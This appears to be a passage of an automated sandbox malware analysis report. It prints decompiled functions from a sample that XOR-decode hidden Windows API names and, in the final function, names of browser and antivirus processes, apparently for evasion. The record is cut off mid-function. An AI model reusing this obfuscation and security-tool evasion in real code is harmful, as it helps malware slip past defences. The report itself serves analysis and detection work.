                                                                    0x0041dfc0
                                                                    0x0041dfc4
                                                                    0x0041dfc8
                                                                    0x0041dfcc
                                                                    0x0041dfd0
                                                                    0x0041dfd4
                                                                    0x0041dfd9
                                                                    0x0041dfde
                                                                    0x0041dfe3
                                                                    0x0041dfe8
                                                                    0x0041dfed
                                                                    0x0041dff2
                                                                    0x0041dff4
                                                                    0x0041dff4
                                                                    0x0041dff8
                                                                    0x0041dff9
                                                                    0x0041e002
                                                                    0x0041e00a
                                                                    0x0041e00a
                                                                    0x0041e02d
                                                                    0x0041e032

                                                                    APIs
                                                                    • WSASocketA.WS2_32(?,?,?,?,?,?,00000001,00000000,00000000), ref: 0041E02D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: Socket
                                                                    • String ID:
                                                                    • API String ID: 38366605-0
                                                                    • Opcode ID: b4171b7f214a7de360139627b43536c38f3f44d1f4e092b893b01e00ed40da00
                                                                    • Instruction ID: bbef52d72cf7b2b452e555d19d380a412b97b80408e177665ac70ba327a4d039
                                                                    • Opcode Fuzzy Hash: b4171b7f214a7de360139627b43536c38f3f44d1f4e092b893b01e00ed40da00
                                                                    • Instruction Fuzzy Hash: B901236150C3C1AFC311DB7C984485BBFE56AEA224F08CF5CF0E987296E224C50ACB67
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041ADD0(struct _SECURITY_ATTRIBUTES* _a4, int _a8, CHAR* _a12) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				void* _t19;
                                                                    				void* _t21;
                                                                    				CHAR* _t28;
                                                                    
                                                                    				if( *0x447e04 == 0) {
                                                                    					_v14 = 0xf2;
                                                                    					_v11 = 0xf2;
                                                                    					_v7 = 0xf2;
                                                                    					 *_t28 = 0xd4;
                                                                    					_v15 = 0xe5;
                                                                    					_v13 = 0xf6;
                                                                    					_v12 = 0xe3;
                                                                    					_v10 = 0xda;
                                                                    					_v9 = 0xe2;
                                                                    					_v8 = 0xe3;
                                                                    					_v6 = 0xef;
                                                                    					_v5 = 0xd6;
                                                                    					_v4 = 0x97;
                                                                    					_t21 = 0;
                                                                    					do {
                                                                    						 *(_t28 + _t21) =  *(_t28 + _t21) ^ 0x00000097;
                                                                    						_t21 = _t21 + 1;
                                                                    					} while (_t21 < 0xd);
                                                                    					 *0x447e04 = E0041A600(_t28);
                                                                    				}
                                                                    				_t19 = CreateMutexA(_a4, _a8, _a12); // executed
                                                                    				return _t19;
                                                                    			}


















                                                                    0x0041adda
                                                                    0x0041ade0
                                                                    0x0041ade4
                                                                    0x0041ade8
                                                                    0x0041adec
                                                                    0x0041adf0
                                                                    0x0041adf5
                                                                    0x0041adfa
                                                                    0x0041adfe
                                                                    0x0041ae03
                                                                    0x0041ae08
                                                                    0x0041ae0c
                                                                    0x0041ae11
                                                                    0x0041ae16
                                                                    0x0041ae1b
                                                                    0x0041ae20
                                                                    0x0041ae20
                                                                    0x0041ae24
                                                                    0x0041ae25
                                                                    0x0041ae36
                                                                    0x0041ae36
                                                                    0x0041ae4a
                                                                    0x0041ae4f

                                                                    APIs
                                                                    • CreateMutexA.KERNELBASE(?,?,?,000000FF,004136B9,?,00000001), ref: 0041AE4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMutex
                                                                    • String ID:
                                                                    • API String ID: 1964310414-0
                                                                    • Opcode ID: ed7a85808df9163a54828d130bedc345f93f1baa615cfb89a8792b59307af05e
                                                                    • Instruction ID: 9450dec0f946452092b28b7ca1b1544e5d437e8971cec4b6ae52d1343cb046bb
                                                                    • Opcode Fuzzy Hash: ed7a85808df9163a54828d130bedc345f93f1baa615cfb89a8792b59307af05e
                                                                    • Instruction Fuzzy Hash: 2101F76140D7C29EC312DB7C894488FBF9559A3220F18CB9DE0E9872E3E6248446C763
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041D130(void* _a4, char* _a8, int _a12) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				void* _t19;
                                                                    				void* _t21;
                                                                    				CHAR* _t27;
                                                                    
                                                                    				if( *0x447f54 == 0) {
                                                                    					_v14 = 0xbe;
                                                                    					_v11 = 0xbe;
                                                                    					_v6 = 0xbe;
                                                                    					 *_t27 = 0x94;
                                                                    					_v15 = 0xab;
                                                                    					_v13 = 0xb5;
                                                                    					_v12 = 0x88;
                                                                    					_v10 = 0xa9;
                                                                    					_v9 = 0xad;
                                                                    					_v8 = 0xb2;
                                                                    					_v7 = 0xb8;
                                                                    					_v5 = 0x9a;
                                                                    					_v4 = 0xdb;
                                                                    					_t21 = 0;
                                                                    					do {
                                                                    						 *(_t27 + _t21) =  *(_t27 + _t21) ^ 0x000000db;
                                                                    						_t21 = _t21 + 1;
                                                                    					} while (_t21 < 0xd);
                                                                    					 *0x447f54 = E0041C580(_t27);
                                                                    				}
                                                                    				_t19 = OpenServiceA(_a4, _a8, _a12); // executed
                                                                    				return _t19;
                                                                    			}


















                                                                    0x0041d13a
                                                                    0x0041d13e
                                                                    0x0041d142
                                                                    0x0041d146
                                                                    0x0041d14a
                                                                    0x0041d14e
                                                                    0x0041d153
                                                                    0x0041d158
                                                                    0x0041d15d
                                                                    0x0041d162
                                                                    0x0041d167
                                                                    0x0041d16c
                                                                    0x0041d171
                                                                    0x0041d176
                                                                    0x0041d17b
                                                                    0x0041d180
                                                                    0x0041d180
                                                                    0x0041d184
                                                                    0x0041d185
                                                                    0x0041d196
                                                                    0x0041d196
                                                                    0x0041d1aa
                                                                    0x0041d1af

                                                                    APIs
                                                                    • OpenServiceA.ADVAPI32(?,?,?,80000000,0000FFB9,?,00447B7C,?,?,?,?,?,?,?,0041F71F,?), ref: 0041D1AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: OpenService
                                                                    • String ID:
                                                                    • API String ID: 3098006287-0
                                                                    • Opcode ID: 8ad8555aae2914c87ab83e1b127080138661eb196913903355f7bb7feac84cdd
                                                                    • Instruction ID: 8caca4a4ce0d112ee089aba942ab0f3bae238fe4d1f2d8d686c823bb8b6763ac
                                                                    • Opcode Fuzzy Hash: 8ad8555aae2914c87ab83e1b127080138661eb196913903355f7bb7feac84cdd
                                                                    • Instruction Fuzzy Hash: FF01F76101C7C2ADC322DB7C884445FBFA05AA7120F48CF9DF1F88A2E6E224844AC767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00561D1B(void* _a4, long _a8, long _a12, DWORD* _a16) {
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				char _v20;
                                                                    				intOrPtr _t25;
                                                                    				int _t26;
                                                                    				void* _t30;
                                                                    
                                                                    				_t25 =  *0x5633b0;
                                                                    				if(_t25 == 0) {
                                                                    					_v20 = 0xa7;
                                                                    					_v19 = 0x98;
                                                                    					_v18 = 0x83;
                                                                    					_v17 = 0x85;
                                                                    					_v16 = 0x84;
                                                                    					_v15 = 0x90;
                                                                    					_v14 = 0x9d;
                                                                    					_v13 = 0xa1;
                                                                    					_v12 = 0x83;
                                                                    					_v11 = 0x9e;
                                                                    					_v10 = 0x85;
                                                                    					_v9 = 0x94;
                                                                    					_v8 = 0x92;
                                                                    					_v7 = 0x85;
                                                                    					_v6 = 0xf1;
                                                                    					do {
                                                                    						 *(_t30 + _t25 - 0x10) =  *(_t30 + _t25 - 0x10) ^ 0x000000f1;
                                                                    						_t25 = _t25 + 1;
                                                                    					} while (_t25 < 0xf);
                                                                    					 *0x5633b0 = E00561A0E( &_v20);
                                                                    				}
                                                                    				_t26 = VirtualProtect(_a4, _a8, _a12, _a16); // executed
                                                                    				return _t26;
                                                                    			}





















                                                                    0x00561d21
                                                                    0x00561d28
                                                                    0x00561d2a
                                                                    0x00561d2e
                                                                    0x00561d32
                                                                    0x00561d36
                                                                    0x00561d3a
                                                                    0x00561d3e
                                                                    0x00561d42
                                                                    0x00561d46
                                                                    0x00561d4a
                                                                    0x00561d4e
                                                                    0x00561d52
                                                                    0x00561d56
                                                                    0x00561d5a
                                                                    0x00561d5e
                                                                    0x00561d62
                                                                    0x00561d66
                                                                    0x00561d66
                                                                    0x00561d6b
                                                                    0x00561d6c
                                                                    0x00561d7b
                                                                    0x00561d7b
                                                                    0x00561d8c
                                                                    0x00561d8f

                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(?,00000000,00000000,?,00000000,00000000,?,0056199A), ref: 00561D8C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614225956.0000000000561000.00000020.00000001.01000000.00000008.sdmp, Offset: 00560000, based on PE: true
                                                                    • Associated: 00000002.00000002.614209974.0000000000560000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614242281.0000000000563000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614256717.0000000000564000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_560000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: fb929bc17d895d6cdd98a20284e8491567b96531312f9708206faf75403b9023
                                                                    • Instruction ID: 475bcae1017eba7857531018e2431edf757d2d8b831e8b711661d5b6807e9369
                                                                    • Opcode Fuzzy Hash: fb929bc17d895d6cdd98a20284e8491567b96531312f9708206faf75403b9023
                                                                    • Instruction Fuzzy Hash: 0311C3109187CAADCF22DBBC4C0849DBF655927134B1887C8F4F06B2E6D7704212D7A6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041A8E0(void* _a4) {
                                                                    				char _v1;
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				int _t16;
                                                                    				void* _t18;
                                                                    				CHAR* _t23;
                                                                    
                                                                    				if( *0x447dd4 == 0) {
                                                                    					_v8 = 0xd7;
                                                                    					_v2 = 0xd7;
                                                                    					 *_t23 = 0xf1;
                                                                    					_v11 = 0xde;
                                                                    					_v10 = 0xdd;
                                                                    					_v9 = 0xc1;
                                                                    					_v7 = 0xfa;
                                                                    					_v6 = 0xd3;
                                                                    					_v5 = 0xdc;
                                                                    					_v4 = 0xd6;
                                                                    					_v3 = 0xde;
                                                                    					_v1 = 0xb2;
                                                                    					_t18 = 0;
                                                                    					do {
                                                                    						 *(_t23 + _t18) =  *(_t23 + _t18) ^ 0x000000b2;
                                                                    						_t18 = _t18 + 1;
                                                                    					} while (_t18 < 0xc);
                                                                    					 *0x447dd4 = E0041A600(_t23);
                                                                    				}
                                                                    				_t16 = FindCloseChangeNotification(_a4); // executed
                                                                    				return _t16;
                                                                    			}

















                                                                    0x0041a8ea
                                                                    0x0041a8f0
                                                                    0x0041a8f4
                                                                    0x0041a8f8
                                                                    0x0041a8fc
                                                                    0x0041a900
                                                                    0x0041a905
                                                                    0x0041a90a
                                                                    0x0041a90f
                                                                    0x0041a914
                                                                    0x0041a919
                                                                    0x0041a91e
                                                                    0x0041a922
                                                                    0x0041a927
                                                                    0x0041a930
                                                                    0x0041a930
                                                                    0x0041a934
                                                                    0x0041a935
                                                                    0x0041a946
                                                                    0x0041a946
                                                                    0x0041a950
                                                                    0x0041a955

                                                                    APIs
                                                                    • FindCloseChangeNotification.KERNELBASE(?,00447B7C,?,00447B7C,?,?,?,?,?,00000001), ref: 0041A950
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    • Opcode ID: 6a1dc7c0719da4f0201af0f491763625800c054aea6abd20a382dbba3a02c501
                                                                    • Instruction ID: 12183129b2568a6ea25f0618c91f0b99db0db3bce0941212f6c819734e555830
                                                                    • Opcode Fuzzy Hash: 6a1dc7c0719da4f0201af0f491763625800c054aea6abd20a382dbba3a02c501
                                                                    • Instruction Fuzzy Hash: 7101E56141D7C29AC322D77C590458FBFE45AA3124F08CF9DE4F8862E2E220815AC367
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041AEE0(CHAR* _a4) {
                                                                    				char _v1;
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				int _t16;
                                                                    				void* _t18;
                                                                    				CHAR* _t23;
                                                                    
                                                                    				if( *0x447e5c == 0) {
                                                                    					_v11 = 0xe7;
                                                                    					_v9 = 0xe7;
                                                                    					_v7 = 0xe7;
                                                                    					_v3 = 0xe7;
                                                                    					 *_t23 = 0xc6;
                                                                    					_v10 = 0xee;
                                                                    					_v8 = 0xf6;
                                                                    					_v6 = 0xc4;
                                                                    					_v5 = 0xeb;
                                                                    					_v4 = 0xee;
                                                                    					_v2 = 0xc3;
                                                                    					_v1 = 0x82;
                                                                    					_t18 = 0;
                                                                    					do {
                                                                    						 *(_t23 + _t18) =  *(_t23 + _t18) ^ 0x00000082;
                                                                    						_t18 = _t18 + 1;
                                                                    					} while (_t18 < 0xc);
                                                                    					 *0x447e5c = E0041A600(_t23);
                                                                    				}
                                                                    				_t16 = DeleteFileA(_a4); // executed
                                                                    				return _t16;
                                                                    			}

















                                                                    0x0041aeea
                                                                    0x0041aef0
                                                                    0x0041aef4
                                                                    0x0041aef8
                                                                    0x0041aefc
                                                                    0x0041af00
                                                                    0x0041af04
                                                                    0x0041af08
                                                                    0x0041af0d
                                                                    0x0041af12
                                                                    0x0041af17
                                                                    0x0041af1b
                                                                    0x0041af20
                                                                    0x0041af25
                                                                    0x0041af27
                                                                    0x0041af27
                                                                    0x0041af2b
                                                                    0x0041af2c
                                                                    0x0041af3d
                                                                    0x0041af3d
                                                                    0x0041af47
                                                                    0x0041af4c

                                                                    APIs
                                                                    • DeleteFileA.KERNELBASE(?), ref: 0041AF47
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteFile
                                                                    • String ID:
                                                                    • API String ID: 4033686569-0
                                                                    • Opcode ID: 121531b094e9b78c8816023c5475453407e25e6526895be5ccbd1988ea7f890a
                                                                    • Instruction ID: fecea2d5f9571f78c09873e2538638400501ebd8a49b0a7d963a9301897bf815
                                                                    • Opcode Fuzzy Hash: 121531b094e9b78c8816023c5475453407e25e6526895be5ccbd1988ea7f890a
                                                                    • Instruction Fuzzy Hash: 9201EC5100D7C29EC312DB7D584458BBFD419A3124F18CFAEE4E8872E2D224C65AC727
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E10001470() {
                                                                    				void* _v0;
                                                                    				void* _v4;
                                                                    				void* _v8;
                                                                    				char _v260;
                                                                    				char _v263;
                                                                    				char _v264;
                                                                    				char _v265;
                                                                    				char _v266;
                                                                    				char _v267;
                                                                    				char _v268;
                                                                    				char _v269;
                                                                    				char _v270;
                                                                    				char _v271;
                                                                    				char _v272;
                                                                    				char _v275;
                                                                    				char _v276;
                                                                    				char _v277;
                                                                    				char _v278;
                                                                    				char _v279;
                                                                    				char _v280;
                                                                    				char _v281;
                                                                    				char _v282;
                                                                    				char _v283;
                                                                    				char _v284;
                                                                    				char _v288;
                                                                    				char _v289;
                                                                    				char _v290;
                                                                    				char _v291;
                                                                    				char _v292;
                                                                    				char _v293;
                                                                    				char _v294;
                                                                    				char _v295;
                                                                    				char _v296;
                                                                    				char _v297;
                                                                    				char _v298;
                                                                    				char _v299;
                                                                    				char _v300;
                                                                    				char _v301;
                                                                    				char _v302;
                                                                    				char _v303;
                                                                    				char _v304;
                                                                    				char _v305;
                                                                    				char _v306;
                                                                    				char _v307;
                                                                    				char _v308;
                                                                    				char _v309;
                                                                    				char _v310;
                                                                    				char _v311;
                                                                    				char _v312;
                                                                    				char _v313;
                                                                    				char _v314;
                                                                    				char _v315;
                                                                    				char _v316;
                                                                    				char _v317;
                                                                    				char _v318;
                                                                    				char _v319;
                                                                    				char _v320;
                                                                    				char _v324;
                                                                    				char _v325;
                                                                    				char _v326;
                                                                    				char _v327;
                                                                    				char _v328;
                                                                    				char _v329;
                                                                    				char _v330;
                                                                    				char _v331;
                                                                    				char _v332;
                                                                    				char _v333;
                                                                    				char _v334;
                                                                    				char _v335;
                                                                    				char _v336;
                                                                    				char _v340;
                                                                    				char _v341;
                                                                    				char _v342;
                                                                    				char _v343;
                                                                    				char _v344;
                                                                    				char _v345;
                                                                    				char _v346;
                                                                    				char _v347;
                                                                    				char _v348;
                                                                    				char _v349;
                                                                    				char _v350;
                                                                    				char _v351;
                                                                    				char _v352;
                                                                    				char _v353;
                                                                    				char _v354;
                                                                    				char _v355;
                                                                    				char _v356;
                                                                    				char _v357;
                                                                    				char _v358;
                                                                    				char _v359;
                                                                    				char _v360;
                                                                    				char _v361;
                                                                    				char _v362;
                                                                    				char _v363;
                                                                    				char _v364;
                                                                    				void* _v376;
                                                                    				void* _v377;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* _t188;
                                                                    				void* _t189;
                                                                    				void* _t190;
                                                                    				signed int _t197;
                                                                    				void* _t199;
                                                                    				void* _t201;
                                                                    				signed char _t207;
                                                                    				signed char _t208;
                                                                    				void* _t211;
                                                                    				void* _t213;
                                                                    				void* _t217;
                                                                    				void* _t220;
                                                                    				void* _t244;
                                                                    				char _t248;
                                                                    				void* _t249;
                                                                    				signed short _t250;
                                                                    				signed short _t251;
                                                                    				void* _t252;
                                                                    				void* _t253;
                                                                    				void* _t254;
                                                                    				void* _t256;
                                                                    				void* _t257;
                                                                    				signed int _t259;
                                                                    				void* _t279;
                                                                    				signed int _t294;
                                                                    				void* _t307;
                                                                    				void* _t308;
                                                                    				void* _t310;
                                                                    				void* _t312;
                                                                    				void* _t314;
                                                                    				void* _t316;
                                                                    				void* _t318;
                                                                    
                                                                    				_v352 = 0xa0;
                                                                    				_v351 = 0xac;
                                                                    				_v350 = 0xb1;
                                                                    				_v349 = 0xb9;
                                                                    				_v348 = 0xa5;
                                                                    				_v347 = 0xa6;
                                                                    				_v346 = 0xbb;
                                                                    				_v345 = 0xac;
                                                                    				_v344 = 0xe7;
                                                                    				_v343 = 0xac;
                                                                    				_v342 = 0xb1;
                                                                    				_v341 = 0xac;
                                                                    				_v340 = 0xc9;
                                                                    				_t252 = 0;
                                                                    				goto L1;
                                                                    				do {
                                                                    					L3:
                                                                    					 *(_t307 + _t253 + 8) =  *(_t307 + _t253 + 8) ^ 0x000000c9;
                                                                    					_t253 = _t253 + 1;
                                                                    				} while (_t253 < 0xc);
                                                                    				_v352 = 0xb3;
                                                                    				_v351 = 0xa5;
                                                                    				_v350 = 0xaa;
                                                                    				_v349 = 0xa5;
                                                                    				_v348 = 0xa0;
                                                                    				_v347 = 0xac;
                                                                    				_v346 = 0xa7;
                                                                    				_v345 = 0xbd;
                                                                    				_v344 = 0xe7;
                                                                    				_v343 = 0xac;
                                                                    				_v342 = 0xb1;
                                                                    				_v341 = 0xac;
                                                                    				_v340 = 0xc9;
                                                                    				_t254 = 0;
                                                                    				do {
                                                                    					 *(_t307 + _t254 + 0x14) =  *(_t307 + _t254 + 0x14) ^ 0x000000c9;
                                                                    					_t254 = _t254 + 1;
                                                                    				} while (_t254 < 0xd);
                                                                    				_v265 = 0x78;
                                                                    				_v303 = 0x78;
                                                                    				_v277 = 0x78;
                                                                    				_v272 = 0x7a;
                                                                    				_v271 = 0x61;
                                                                    				_v270 = 0x70;
                                                                    				_v269 = 0x72;
                                                                    				_v268 = 0x6f;
                                                                    				_v267 = 0x2e;
                                                                    				_v266 = 0x65;
                                                                    				_v264 = 0x65;
                                                                    				_v263 = 0;
                                                                    				_v308 = 0x73;
                                                                    				_v307 = 0x6d;
                                                                    				_v306 = 0x63;
                                                                    				_v305 = 0x2e;
                                                                    				_v304 = 0x65;
                                                                    				_v302 = 0x65;
                                                                    				_v301 = 0;
                                                                    				_v284 = 0x63;
                                                                    				_v283 = 0x63;
                                                                    				_v282 = 0x61;
                                                                    				_v281 = 0x70;
                                                                    				_v280 = 0x70;
                                                                    				_v279 = 0x2e;
                                                                    				_v278 = 0x65;
                                                                    				_v276 = 0x65;
                                                                    				_v275 = 0;
                                                                    				_v320 = 0xa6;
                                                                    				_v319 = 0xbc;
                                                                    				_v318 = 0xbd;
                                                                    				_v317 = 0xb9;
                                                                    				_v316 = 0xa6;
                                                                    				_v315 = 0xba;
                                                                    				_v314 = 0xbd;
                                                                    				_v313 = 0xe7;
                                                                    				_v312 = 0xac;
                                                                    				_v311 = 0xb1;
                                                                    				_v310 = 0xac;
                                                                    				_v309 = 0xc9;
                                                                    				_t256 = 0;
                                                                    				do {
                                                                    					 *(_t307 + _t256 + 0x34) =  *(_t307 + _t256 + 0x34) ^ 0x000000c9;
                                                                    					_t256 = _t256 + 1;
                                                                    				} while (_t256 < 0xc);
                                                                    				_v364 = 0xa4;
                                                                    				_v363 = 0xb9;
                                                                    				_v362 = 0xaf;
                                                                    				_v361 = 0xbd;
                                                                    				_v360 = 0xbb;
                                                                    				_v359 = 0xa8;
                                                                    				_v358 = 0xb0;
                                                                    				_v357 = 0xe7;
                                                                    				_v356 = 0xac;
                                                                    				_v355 = 0xb1;
                                                                    				_v354 = 0xac;
                                                                    				_v353 = 0xc9;
                                                                    				_t257 = 0;
                                                                    				do {
                                                                    					 *(_t307 + _t257 + 8) =  *(_t307 + _t257 + 8) ^ 0x000000c9;
                                                                    					_t257 = _t257 + 1;
                                                                    				} while (_t257 < 0xc);
                                                                    				_v300 = 0xac;
                                                                    				_v294 = 0xac;
                                                                    				_v291 = 0xac;
                                                                    				_v289 = 0xac;
                                                                    				_v299 = 0xb1;
                                                                    				_v298 = 0xb9;
                                                                    				_v297 = 0xa5;
                                                                    				_v296 = 0xa6;
                                                                    				_v295 = 0xbb;
                                                                    				_v293 = 0xbb;
                                                                    				_v292 = 0xe7;
                                                                    				_v290 = 0xb1;
                                                                    				_v288 = 0xc9;
                                                                    				_t188 = 0;
                                                                    				do {
                                                                    					 *(_t307 + _t188 + 0x48) =  *(_t307 + _t188 + 0x48) ^ 0x000000c9;
                                                                    					_t188 = _t188 + 1;
                                                                    				} while (_t188 < 0xd);
                                                                    				_v336 = 0xa8;
                                                                    				_v335 = 0xbd;
                                                                    				_v334 = 0xa4;
                                                                    				_v333 = 0xa5;
                                                                    				_v332 = 0xa4;
                                                                    				_v331 = 0xaa;
                                                                    				_v330 = 0xa0;
                                                                    				_v329 = 0xa8;
                                                                    				_v328 = 0xe7;
                                                                    				_v327 = 0xad;
                                                                    				_v326 = 0xa5;
                                                                    				_v325 = 0xa5;
                                                                    				_v324 = 0xc9;
                                                                    				_t189 = 0;
                                                                    				do {
                                                                    					 *(_t307 + _t189 + 0x24) =  *(_t307 + _t189 + 0x24) ^ 0x000000c9;
                                                                    					_t189 = _t189 + 1;
                                                                    				} while (_t189 < 0xd);
                                                                    				_t248 = _v308;
                                                                    				if(_t248 >= 0x5f) {
                                                                    					_t249 = _t248 + 0xffff;
                                                                    				} else {
                                                                    					_t249 = _t248 + 0x67;
                                                                    				}
                                                                    				_t190 = E10001FB0(0);
                                                                    				_t308 = _t307 + 4;
                                                                    				if(_t190 != 0) {
                                                                    					_t294 =  *0x10004008;
                                                                    					if(E10002450(0,  &_v260, 0xff) != 0) {
                                                                    						_t259 =  *0x1000400c;
                                                                    						_t197 =  *(_t308 + 0xb) * 0x00000065 & _t294;
                                                                    						_t279 = 0x25;
                                                                    						do {
